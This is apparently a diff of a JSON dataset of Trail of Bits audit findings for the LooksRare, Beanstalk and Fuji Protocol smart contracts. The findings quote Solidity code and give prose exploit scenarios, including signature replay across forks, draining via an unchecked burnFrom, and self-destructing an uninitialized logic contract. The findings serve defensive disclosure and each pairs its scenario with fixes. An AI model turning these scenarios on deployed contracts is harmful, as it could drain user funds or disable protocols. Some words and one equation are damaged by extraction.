whether future demand will grow enough for them to be repaidto sell their Bean tokens rather than lending them to the protocol. Under such circumstances, the protocol will be unable to disincentivize Bean market sales, disrupting its ability to return Bean to its value peg. Exploit Scenario Bean goes through an extended period of increasing demand, overextending its supply. Then, demand for Bean tokens slowly and steadily declines, and the pod line grows in length. At a certain point, some users decide that their time-weighted rate of return is unfavorable or too uncertain despite the promised high yields. Instead of lending their Bean tokens to the protocol, they sell. Recommendations Explore options for backing Bean s value with an oer that is guaranteed to eventually be fullled. 11. Bean and the o\u0000er backing it are strongly correlated Severity: Undetermined Diculty: Undetermined Type: Economic Finding ID: TOB-BEANS-011 Target: The Beanstalk protocol", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", "Difficulty: Undetermined" ] }, { - "title": "1. Risk of reuse of signatures across forks due to lack of chainID validation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "At construction, the LooksRareExchange contract computes the domain separator using the networks chainID , which is xed at the time of deployment. In the event of a post-deployment chain fork, the chainID cannot be updated, and the signatures may be replayed across both versions of the chain. constructor ( address _currencyManager , address _executionManager , address _royaltyFeeManager , address _WETH , address _protocolFeeRecipient ) { // Calculate the domain separator DOMAIN_SEPARATOR = keccak256 ( abi.encode( 0x8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f , // keccak256(\"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\") 0xda9101ba92939daf4bb2e18cd5f942363b9297fbc3232c9dd964abb1fb70ed71 , // keccak256(\"LooksRareExchange\") 0xc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc6 , // keccak256(bytes(\"1\")) for versionId = 1 block.chainid , address ( this ) ) ); currencyManager = ICurrencyManager(_currencyManager); executionManager = IExecutionManager(_executionManager); royaltyFeeManager = IRoyaltyFeeManager(_royaltyFeeManager); WETH = _WETH; protocolFeeRecipient = _protocolFeeRecipient; Figure 1.1: contracts/contracts/LooksRareExchange.sol#L137-L145 The _validateOrder function in the LooksRareExchange contract uses a SignatureChecker function, verify , to check the validity of a signature: // Verify the validity of the signature require ( SignatureChecker.verify( orderHash, makerOrder.signer, makerOrder.v, makerOrder.r, makerOrder.s, DOMAIN_SEPARATOR ), \"Signature: Invalid\" ); Figure 1.2: contracts/contracts/LooksRareExchange.sol#L576-L587 However, the verify function checks only that a user has signed the domainSeparator . As a result, in the event of a hard fork, an attacker could reuse signatures to receive user funds on both chains. To mitigate this risk, if a change in the chainID is detected, the domain separator can be cached and regenerated. Alternatively, instead of regenerating the entire domain separator, the chainID can be included in the schema of the signature passed to the order hash. /** * @notice Returns whether the signer matches the signed message * @param hash the hash containing the signed mesage * @param signer the signer address to confirm message validity * @param v parameter (27 or 28) * @param r parameter * @param s parameter * @param domainSeparator paramer to prevent signature being executed in other chains and environments * @return true --> if valid // false --> if invalid */ function verify ( bytes32 hash , address signer , uint8 v , bytes32 r , bytes32 s , bytes32 domainSeparator ) internal view returns ( bool ) { // \\x19\\x01 is the standardized encoding prefix // https://eips.ethereum.org/EIPS/eip-712#specification bytes32 digest = keccak256 (abi.encodePacked( \"\\x19\\x01\" , domainSeparator, hash )); if (Address.isContract(signer)) { // 0x1626ba7e is the interfaceId for signature contracts (see IERC1271) return IERC1271(signer).isValidSignature(digest, abi.encodePacked(r, s, v)) == 0x1626ba7e ; } else { return recover(digest, v, r, s) == signer; } } Figure 1.3: contracts/contracts/libraries/SignatureChecker.sol#L41-L68 The signature schema does not account for the contracts chain. If a fork of Ethereum is made after the contracts creation, every signature will be usable in both forks. Exploit Scenario Bob signs a maker order on the Ethereum mainnet. He signs the domain separator with a signature to sell an NFT. Later, Ethereum is hard-forked and retains the same chain ID. As a result, there are two parallel chains with the same chain ID, and Eve can use Bobs signature to match orders on the forked chain. Recommendations Short term, to prevent post-deployment forks from aecting signatures, add the chain ID opcode to the signature schema. Long term, identify and document the risks associated with having forks of multiple chains and develop related mitigation strategies.", + "title": "12. Ability to whitelist assets uncorrelated with Bean price, misaligning governance incentives ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "Stalk is the governance token of the system, rewarded to users who deposit certain whitelisted assets into the silo, the systems asset storage. When demand for Bean increases, the protocol increases the Bean supply by minting new Bean tokens and allocating some of them to Stalk holders. Additionally, if the price of Bean remains above its peg for an extended period of time, then a season of plenty (SoP) occurs: Bean is minted and sold on the open market in exchange for exogenous assets such as ETH. These exogenous assets are allocated entirely to Stalk holders. When demand for Bean decreases, the protocol decreases the Bean supply by borrowing Bean tokens from Bean owners. If the demand for Bean is persistently low and some of these loans are never repaid, Stalk holders are not directly penalized by the protocol. However, if the only whitelisted assets are strongly correlated with the price of Bean (such as ETH:BEAN LP tokens), then the value of Stalk holders deposited collateral would decline, indirectly penalizing Stalk holders for an unhealthy system. If, however, exogenous assets without a strong correlation to Bean are whitelisted, then Stalk holders who have deposited such assets will be protected from nancial penalties if the price of Bean crashes. Exploit Scenario Stalk holders vote to whitelist ETH as a depositable asset. They proceed to deposit ETH and begin receiving shares of rewards, including 3CRV tokens acquired during SoPs. Governance is now incentivized to increase the supply of Bean as high as possible to obtain more 3CRV rewards, which eventually results in an overextension of the Bean supply and a subsequent price crash. After the Bean price crashes, Stalk holders withdraw their deposited ETH and 3CRV rewards. Because ETH is not strongly correlated with the price of Bean, they do not suer nancial loss as a result of the crash. Alternatively, because of the lack of on-chain enforcement of o-chain votes, the above scenario could occur if the community multisignature wallet whitelists ETH, even if no related vote occurred. Recommendations Do not allow any assets that are not strongly correlated with the price of Bean to be whitelisted. Additionally, implement monitoring systems that provide alerts every time a new asset is whitelisted.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "2. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The owner of a LooksRare protocol contract can be changed by calling the transferOwnership function in OpenZeppelins Ownable contract. This function internally calls the _transferOwnership function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _transferOwnership( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership ( address newOwner ) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 2.1: OpenZeppelins Ownable contract Exploit Scenario Alice and Bob invoke the transferOwnership() function on the LooksRare multisig wallet to change the address of an existing contracts owner. They accidentally enter the wrong address, and ownership of the contract is transferred to the incorrect address. As a result, access to the contract is permanently revoked. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts ( appendix E ) and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "title": "13. Unchecked burnFrom return value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "While recapitalizing the Beanstalk protocol, Bean and LP tokens that existed before the 2022 governance hack are represented as unripe tokens. Ripening is the process of burning unripe tokens in exchange for a pro rata share of the underlying assets generated during the Barn Raise. Holders of unripe tokens call the ripen function to receive their portion of the recovered underlying assets. This portion grows while the price of Bean is above its peg, incentivizing users to ripen their tokens later, when more of the loss has been recovered. The ripen code assumes that if users try to redeem more unripe tokens than they hold, burnFrom will revert. If burnFrom returns false instead of reverting, the failure of the balance check will go undetected, and the caller will be able to recover all of the underlying tokens held by the contract. While LibUnripe.decrementUnderlying will revert on calls to ripen more than the contracts balance, it does not check the users balance. The source code of the unripeToken contract was not provided for review during this audit, so we could not determine whether its burnFrom method is implemented safely. function ripen ( address unripeToken , uint256 amount , LibTransfer.To mode ) external payable nonReentrant returns ( uint256 underlyingAmount ) { underlyingAmount = getPenalizedUnderlying(unripeToken, amount); LibUnripe.decrementUnderlying(unripeToken, underlyingAmount); IBean(unripeToken).burnFrom( msg.sender , amount); address underlyingToken = s.u[unripeToken].underlyingToken; IERC20(underlyingToken).sendToken(underlyingAmount, msg.sender , mode); emit Ripen( msg.sender , unripeToken, amount, underlyingAmount); } Figure 13.1: The ripen() function in UnripeFacet.sol#L51- Exploit Scenario Alice notices that the burnFrom function is implemented incorrectly in the unripeToken contract. She calls ripen with an amount greater than her unripe token balance and is able to receive the contracts entire balance of underlying tokens. Recommendations Short term, add an assert statement to ensure that users who call ripen have sucient balance to burn the given amount of unripe tokens. Long term, implement all security-critical assertions on user-supplied input in the beginning of external functions. Do not rely on untrusted code to perform required safety checks or to behave as expected.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "3. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identied a dependency with a known vulnerability. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details the high severity issue: CVE ID", + "title": "1. Anyone can destroy the FujiVault logic contract if its initialize function was not called during deployment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Anyone can destroy the FujiVault logic contract if its initialize function has not already been called. Calling initialize on a logic contract is uncommon, as usually nothing is gained by doing so. The deployment script does not call initialize on any logic contract. As a result, the exploit scenario detailed below is possible after deployment. This issue is similar to a bug in AAVE that found in 2020. OpenZeppelins hardhat-upgrades plug-in protects against this issue by disallowing the use of selfdestruct or delegatecall on logic contracts. However, the Fuji Protocol team has explicitly worked around these protections by calling delegatecall in assembly, which the plug-in does not detect. Exploit Scenario The Fuji contracts are deployed, but the initialize functions of the logic contracts are not called. Bob, an attacker, deploys a contract to the address alwaysSelfdestructs, which simply always executes the selfdestruct opcode. Additionally, Bob deploys a contract to the address alwaysSucceeds, which simply never reverts. Bob calls initialize on the FujiVault logic contract, thereby becoming its owner. To make the call succeed, Bob passes 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE as the value for the _collateralAsset and _borrowAsset parameters. He then calls FujiVaultLogic.setActiveProvider(alwaysSelfdestructs), followed by FujiVault.setFujiERC1155(alwaysSucceeds) to prevent an additional revert in the next and nal call. Finally, Bob calls FujiVault.deposit(1), sending 1 wei. This triggers a delegatecall to alwaysSelfdestructs, thereby destroying the FujiVault logic contract and making the protocol unusable until its proxy contract is upgraded. 14 Fuji Protocol Because OpenZeppelins upgradeable contracts do not check for a contracts existence before a delegatecall (TOB-FUJI-003), all calls to the FujiVault proxy contract now succeed. This leads to exploits in any protocol integrating the Fuji Protocol. For example, a call that should repay all debt will now succeed even if no debt is repaid. Recommendations Short term, do not use delegatecall to implement providers. See TOB-FUJI-002 for more information. Long term, avoid the use of delegatecall, as it is dicult to use correctly and can introduce vulnerabilities that are hard to detect. 15 Fuji Protocol", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Undetermined" + "Difficulty: Medium" ] }, { - "title": "4. Users that create ask orders cannot modify minPercentageToAsk ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "Users who sell their NFTs on LooksRare are unable to protect their orders against arbitrary changes in royalty fees set by NFT collection owners; as a result, users may receive less of a sales value than expected. Ideally, when a user lists an NFT, he should be able to set a threshold at which the transaction will execute based on the amount of the sales value that he will receive. This threshold is set via the minPercentageToAsk variable in the MakerOrder and TakerOrder structs. The minPercentageToAsk variable protects users who create ask orders from excessive royalty fees. When funds from an order are transferred, the LooksRareExchange contract ensures that the percentage amount that needs to be transferred to the recipient is greater than or equal to minPercentageToAsk (gure 3.1). function _transferFeesAndFunds ( address strategy , address collection , uint256 tokenId , address currency , address from , address to , uint256 amount , uint256 minPercentageToAsk ) internal { // Initialize the final amount that is transferred to seller uint256 finalSellerAmount = amount; // 1. Protocol fee { uint256 protocolFeeAmount = _calculateProtocolFee(strategy, amount); [...] finalSellerAmount -= protocolFeeAmount; } } // 2. Royalty fee { ( address royaltyFeeRecipient , uint256 royaltyFeeAmount ) = royaltyFeeManager.calculateRoyaltyFeeAndGetRecipient( collection, tokenId, amount ); // Check if there is a royalty fee and that it is different to 0 [...] finalSellerAmount -= royaltyFeeAmount; [...] require ( (finalSellerAmount * 10000 ) >= (minPercentageToAsk * amount), \"Fees: Higher than expected\" ); [...] } Figure 4.1: The _transferFeesAndFunds function in LooksRareExchange :422-466 However, users creating ask orders cannot modify minPercentageToAsk . By default, the minPercentageToAsk of orders placed through the LooksRare platform is set to 85%. In cases in which there is no royalty fee and the protocol fee is 2%, minPercentageToAsk could be set to 98%. Exploit Scenario Alice lists an NFT for sale on LooksRare. The protocol fee is 2%, minPercentageToAsk is 85%, and there is no royalty fee. The NFT project grows in popularity, which motivates Eve, the owner of the NFT collection, to raise the royalty fee to 9.5%, the maximum fee allowed by the RoyaltyFeeRegistry contract. Bob purchases Alices NFT. Alice receives 89.5% of the sale even though she could have received 98% of the sale at the time of the listing. Recommendations Short term, set minPercentageToAsk to 100% minus the sum of the protocol fee and the max value for a royalty fee, which is 9.5%. Long term, identify and validate the bounds for all parameters and variables in the smart contract system.", + "title": "2. Providers are implemented with delegatecall ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The system uses delegatecall to execute an active provider's code on a FujiVault, making the FujiVault the holder of the positions in the borrowing protocol. However, delegatecall is generally error-prone, and the use of it introduced the high-severity nding TOB-FUJI-001. It is possible to make a FujiVault the holder of the positions in a borrowing protocol without using delegatecall. Most borrowing protocols include a parameter that species the receiver of tokens that represent a position. For borrowing protocols that do not include this type of parameter, tokens can be transferred to the FujiVault explicitly after they are received from the borrowing protocol; additionally, the tokens can be transferred from the FujiVault to the provider before they are sent to the borrowing protocol. These solutions are conceptually simpler than and preferred to the current solution. Recommendations Short term, implement providers without the use of delegatecall. Set the receiver parameters to the FujiVault, or transfer the tokens corresponding to the position to the FujiVault. Long term, avoid the use of delegatecall, as it is dicult to use correctly and can introduce vulnerabilities that are hard to detect. 16 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Informational", "Difficulty: Undetermined" ] }, { - "title": "5. Excessive privileges of RoyaltyFeeSetter and RoyaltyFeeRegistry owners ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The RoyaltyFeeSetter and RoyaltyFeeRegistry contract owners can manipulate an NFT collections royalty information, such as the fee percentage and the fee receiver; this violates the principle of least privilege. NFT collection owners can use the RoyaltyFeeSetter contract to set the royalty information for their NFT collections. This information is stored in the RoyaltyFeeRegistry contract. However, the owners of the two contracts can also update this information (gures 5.1 and 5.2). function updateRoyaltyInfoForCollection ( address collection , address setter , address receiver , uint256 fee ) external override onlyOwner { require (fee <= royaltyFeeLimit, \"Registry: Royalty fee too high\" ); _royaltyFeeInfoCollection[collection] = FeeInfo({ setter: setter, receiver: receiver, fee: fee }); emit RoyaltyFeeUpdate(collection, setter, receiver, fee); } Figure 5.1: The updateRoyaltyInfoForCollection function in RoyaltyFeeRegistry :54- function updateRoyaltyInfoForCollection ( address collection , address setter , address receiver , uint256 fee ) external onlyOwner { IRoyaltyFeeRegistry(royaltyFeeRegistry).updateRoyaltyInfoForCollection( collection, setter, receiver, fee ); } Figure 5.2: The updateRoyaltyInfoForCollection function in RoyaltyFeeSetter :102-109 This violates the principle of least privilege. Since it is the responsibility of the NFT collections owner to set the royalty information, it is unnecessary for contract owners to have the same ability. Exploit Scenario Alice, the owner of the RoyaltyFeeSetter contract, sets the incorrect receiver address when updating the royalty information for Bobs NFT collection. Bob is now unable to receive fees from his NFT collections secondary sales. Recommendations Short term, remove the ability for users to update an NFT collections royalty information. Long term, clearly document the responsibilities and levels of access provided to privileged users of the system. 6. Insu\u0000cient protection of sensitive information Severity: Low Diculty: High Type: Conguration Finding ID: TOB-LR-6 Target: contracts/hardhat.config.ts", + "title": "3. Lack of contract existence check on delegatecall will result in unexpected behavior ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The VaultControlUpgradeable and Proxy contracts use the delegatecall proxy pattern. If the implementation contract is incorrectly set or self-destructed, the contract may not be able to detect failed executions. The VaultControlUpgradeable contract includes the _execute function, which users can invoke indirectly to execute a transaction to a _target address. This function does not check for contract existence before executing the delegatecall (gure 3.1). /** * @dev Returns byte response of delegatcalls */ function _execute(address _target, bytes memory _data) internal whenNotPaused returns (bytes memory response) { /* solhint-disable */ assembly { let succeeded := delegatecall(sub(gas(), 5000), _target, add(_data, 0x20), mload(_data), 0, 0) let size := returndatasize() response := mload(0x40) mstore(0x40, add(response, and(add(add(size, 0x20), 0x1f), not(0x1f)))) mstore(response, size) returndatacopy(add(response, 0x20), 0, size) switch iszero(succeeded) case 1 { // throw if delegatecall failed revert(add(response, 0x20), size) } } /* solhint-disable */ } 17 Fuji Protocol Figure 3.1: fuji-protocol/contracts/abstracts/vault/VaultBaseUpgradeable.sol#L93-L11 5 The Proxy contract, deployed by the @openzeppelin/hardhat-upgrades library, includes a payable fallback function that invokes the _delegate function when proxy calls are executed. This function is also missing a contract existence check (gure 3.2). /** * @dev Delegates the current call to `implementation`. * * This function does not return to its internall call site, it will return directly to the external caller. */ function _delegate(address implementation) internal virtual { // solhint-disable-next-line no-inline-assembly assembly { // Copy msg.data. We take full control of memory in this inline assembly // block because it will not return to Solidity code. We overwrite the // Solidity scratch pad at memory position 0. calldatacopy(0, 0, calldatasize()) // Call the implementation. // out and outsize are 0 because we don't know the size yet. let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0) // Copy the returned data. returndatacopy(0, 0, returndatasize()) switch result // delegatecall returns 0 on error. case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } } Figure 3.2: Proxy.sol#L16-L41 A delegatecall to a destructed contract will return success (gure 3.3). Due to the lack of contract existence checks, a series of batched transactions may appear to be successful even if one of the transactions fails. The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 3.3: A snippet of the Solidity documentation detailing unexpected behavior related to delegatecall Exploit Scenario Eve upgrades the proxy to point to an incorrect new implementation. As a result, each 18 Fuji Protocol delegatecall returns success without changing the state or executing code. Eve uses this to scam users. Recommendations Short term, implement a contract existence check before any delegatecall. Document the fact that suicide and selfdestruct can lead to unexpected behavior, and prevent future upgrades from using these functions. Long term, carefully review the Solidity documentation, especially the Warnings section, and the pitfalls of using the delegatecall proxy pattern. References Contract Upgrade Anti-Patterns Breaking Aave Upgradeability 19 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: High" ] }, { - "title": "7. Contracts used as dependencies do not track upstream changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare codebase uses a third-party contract, SignatureChecker , but the LooksRare documentation does not specify which version of the contract is used or whether it was modied. This indicates that the LooksRare protocol does not track upstream changes in contracts used as dependencies. Therefore, the LooksRare contracts may not reliably reect updates or security xes implemented in their dependencies, as those updates must be manually integrated into the contracts. Exploit Scenario A third-party contract used in LooksRare receives an update with a critical x for a vulnerability, but the update is not manually integrated in the LooksRare version of the contract. An attacker detects the use of a vulnerable contract in the LooksRare protocol and exploits the vulnerability against one of the contracts. Recommendations Short term, review the codebase and document the source and version of each dependency. Include third-party sources as submodules in the projects Git repository to maintain internal path consistency and ensure that dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", + "title": "4. FujiVault.setFactor is unnecessarily complex and does not properly handle invalid input ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiVault contracts setFactor function sets one of four state variables to a given value. Which state variable is set depends on the value of a string parameter. If an invalid value is passed, setFactor succeeds but does not set any of the state variables. This creates edge cases, makes writing correct code more dicult, and increases the likelihood of bugs. function setFactor( uint64 _newFactorA, uint64 _newFactorB, string calldata _type ) external isAuthorized { bytes32 typeHash = keccak256(abi.encode(_type)); if (typeHash == keccak256(abi.encode(\"collatF\"))) { collatF.a = _newFactorA; collatF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"safetyF\"))) { safetyF.a = _newFactorA; safetyF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"bonusLiqF\"))) { bonusLiqF.a = _newFactorA; bonusLiqF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"protocolFee\"))) { protocolFee.a = _newFactorA; protocolFee.b = _newFactorB; } } Figure 4.1: FujiVault.sol#L475-494 Exploit Scenario A developer on the Fuji Protocol team calls setFactor from another contract. He passes a type that is not handled by setFactor. As a result, code that is expected to set a state variable does nothing, resulting in a more severe vulnerability. 20 Fuji Protocol Recommendations Short term, replace setFactor with four separate functions, each of which sets one of the four state variables. Long term, avoid string constants that simulate enumerations, as they cannot be checked by the typechecker. Instead, use enums and ensure that any code that depends on enum values handles all possible values. 21 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "8. Missing event for a critical operation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The system does not emit an event when a protocol fee is levied in the _transferFeesAndFunds and _transferFeesAndFundsWithWETH functions. Operations that transfer value or perform critical operations should trigger events so that users and o-chain monitoring tools can account for important state changes. if ((protocolFeeRecipient != address (0)) && (protocolFeeAmount != 0)) { IERC20(currency).safeTransferFrom(from, protocolFeeRecipient, protocolFeeAmount); finalSellerAmount -= protocolFeeAmount; } Figure 8.1: Protocol fee transfer in _transferFeesAndFunds function ( contracts/executionStrategies/StrategyDutchAuction.sol#L440-L443 ) Exploit Scenario A smart contract wallet provider has a LooksRare integration that enables its users to buy and sell NFTs. The front end relies on information from LooksRares subgraph to itemize prices, royalties, and fees. Because the system does not emit an event when a protocol fee is incurred, an under-calculation in the wallet providers accounting leads its users to believe they have been overcharged. Recommendations Short term, add events for all critical operations that transfer value, such as when a protocol fee is assessed. Events are vital aids in monitoring contracts and detecting suspicious behavior. Long term, consider adding or accounting for a new protocol fee event in the LooksRare subgraph and any other o-chain monitoring tools LooksRare might be using.", + "title": "5. Preconditions specied in docstrings are not checked by functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The docstrings of several functions specify preconditions that the functions do not automatically check for. For example, the docstring of the FujiVault contracts setFactor function contains the preconditions shown in gure 5.1, but the functions body does not contain the corresponding checks shown in gure 5.2. * For safetyF; Sets Safety Factor of Vault, should be > 1, a/b * For collatF; Sets Collateral Factor of Vault, should be > 1, a/b Figure 5.1: FujiVault.sol#L469-470 require(safetyF.a > safetyF.b); ... require(collatF.a > collatF.b); Figure 5.2: The checks that are missing from FujiVault.setFactor Additionally, the docstring of the Controller contracts doRefinancing function contains the preconditions shown in gure 5.3, but the functions body does not contain the corresponding checks shown in gure 5.4. * @param _ratioB: _ratioA/_ratioB <= 1, and > 0 Figure 5.3: Controller.sol#L41 require(ratioA > 0 && ratioB > 0); require(ratioA <= ratioB); Figure 5.4: The checks that are missing from Controller.doRefinancing Exploit Scenario The setFactor function is called with values that violate its documented preconditions. Because the function does not check for these preconditions, unexpected behavior occurs. 22 Fuji Protocol Recommendations Short term, add checks for preconditions to all functions with preconditions specied in their docstrings. Long term, ensure that all documentation and code are in sync. 23 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "9. Taker orders are not EIP-712 signatures ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "When takers attempt to match order proposals, they are presented with an obscure blob of data. In contrast, makers are presented with a formatted data structure that makes it easier to validate transactions. struct TakerOrder { bool isOrderAsk ; // true --> ask / false --> bid address taker ; // msg.sender uint256 price ; // final price for the purchase uint256 tokenId ; uint256 minPercentageToAsk ; // // slippage protection (9000 --> 90% of the final price must return to ask) bytes params ; // other params (e.g., tokenId) } Figure 9.1: The TakerOrder struct in OrderTypes.sol :31-38 While this issue cannot be exploited directly, it creates an asymmetry between the user experience (UX) of makers and takers. Because of this, users depend on the information that the user interface (UI) displays to them and are limited by the UX of the wallet software they are using. Exploit Scenario 1 Eve, a malicious user, lists a new collection with the same metadata as another, more popular collection. Bob sees Eves listing and thinks that it is the legitimate collection. He creates an order for an NFT in Eves collection, and because he cannot distinguish the parameters of the transaction he is signing, he matches it, losing money in the process. Exploit Scenario 2 Alice, an attacker, compromises the UI, allowing her to manipulate the information displayed by it in order to make illegitimate collections look legitimate. This is a more extreme exploit scenario. Recommendations Short term, evaluate and document the current UI and the pitfalls that users might encounter when matching and creating orders. Long term, evaluate whether adding support for EIP-712 signatures in TakerOrder would minimize the issue and provide a better UX.", + "title": "6. The FujiERC1155.burnBatch function implementation is incorrect ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiERC1155 contracts burnBatch function deducts the unscaled amount from the user's balance and from the total supply of an asset. If the liquidity index of an asset (index[assetId]) is dierent from its initialized value, the execution of burnBatch could result in unintended arithmetic calculations. Instead of deducting the amount value, the function should deduct the amountScaled value. function burnBatch( address _account, uint256[] memory _ids, uint256[] memory _amounts ) external onlyPermit { require(_account != address(0), Errors.VL_ZERO_ADDR_1155); require(_ids.length == _amounts.length, Errors.VL_INPUT_ERROR); address operator = _msgSender(); uint256 accountBalance; uint256 assetTotalBalance; uint256 amountScaled; for (uint256 i = 0; i < _ids.length; i++) { uint256 amount = _amounts[i]; accountBalance = _balances[_ids[i]][_account]; assetTotalBalance = _totalSupply[_ids[i]]; amountScaled = _amounts[i].rayDiv(indexes[_ids[i]]); require(amountScaled != 0 && accountBalance >= amountScaled, Errors.VL_INVALID_BURN_AMOUNT); _balances[_ids[i]][_account] = accountBalance - amount; _totalSupply[_ids[i]] = assetTotalBalance - amount; } emit TransferBatch(operator, _account, address(0), _ids, _amounts); } Figure 6.1: FujiERC1155.sol#L218-247 24 Fuji Protocol Exploit Scenario The burnBatch function is called with an asset for which the liquidity index is dierent from its initialized value. Because amount was used instead of amountScaled, unexpected behavior occurs. Recommendations Short term, revise the burnBatch function so that it uses amountScaled instead of amount when updating a users balance and the total supply of an asset. Long term, use the burn function in the burnBatch function to keep functionality consistent. 25 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: High", + "Difficulty: Low" ] }, { - "title": "10. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the LooksRare contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "7. Error in the white papers equation for the cost of renancing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The white paper uses the following equation (equation 4) to describe how the cost of renancing is calculated: = + + + + is the amount of debt to be renanced and is a summand of the equation. This is incorrect, as it implies that the renancing cost is always greater than the amount of debt to be renanced. A correct version of the equation could be is an amount, or = + + + + = + + * , in which is a , in which percentage. Recommendations Short term, x equation 4 in the white paper. Long term, ensure that the equations in the white paper are correct and in sync with the implementation. 26 Fuji Protocol", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Undetermined" ] }, { - "title": "11. isContract may behave unexpectedly ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare exchange relies on OpenZeppelins SignatureChecker library to verify signatures on-chain. This library, in turn, relies on the isContract function in the Address library to determine whether the signer is a contract or an externally owned account (EOA). However, in Solidity, there is no reliable way to denitively determine whether a given address is a contract, as there are several edge cases in which the underlying extcodesize function can return unexpected results. function isContract( address account) internal view returns ( bool ) { // This method relies on extcodesize, which returns 0 for contracts in // construction, since the code is only stored at the end of the // constructor execution. uint256 size; assembly { size := extcodesize (account) } return size > 0; } Figure 11.1: The isContract function in Address.sol #L27-37 Exploit Scenario A maker order is created and signed by a smart contract wallet. While this order is waiting to be lled, selfdestruct is called on the contract. The call to extcodesize returns 0, 